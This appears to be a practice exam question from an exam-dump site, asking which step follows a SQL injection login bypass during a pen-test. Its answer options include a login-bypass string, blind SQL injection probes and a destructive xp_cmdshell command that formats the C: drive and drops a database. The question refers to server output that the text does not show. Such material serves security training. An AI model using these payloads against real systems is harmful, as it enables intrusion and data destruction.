PrepAway - Latest Free Exam Questions & Answers

What is the next step you should do?

You are conducting a pen-test against a company's website using SQL Injection techniques. You
enter "anything or 1=1-" in the username field of an authentication form. This is the output returned
from the server.
What is the next step you should do?


A.
Identify the user context of the web application by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5
AND
USER_NAME() = ‘dbo’

B.
Identify the database and table name by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5
AND
ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE
xtype=’U’),1))) > 109

C.
Format the C: drive and delete the database by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND
xp_cmdshell ‘format c: /q /yes ‘; drop database myDB; –

D.
Reboot the web server by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5
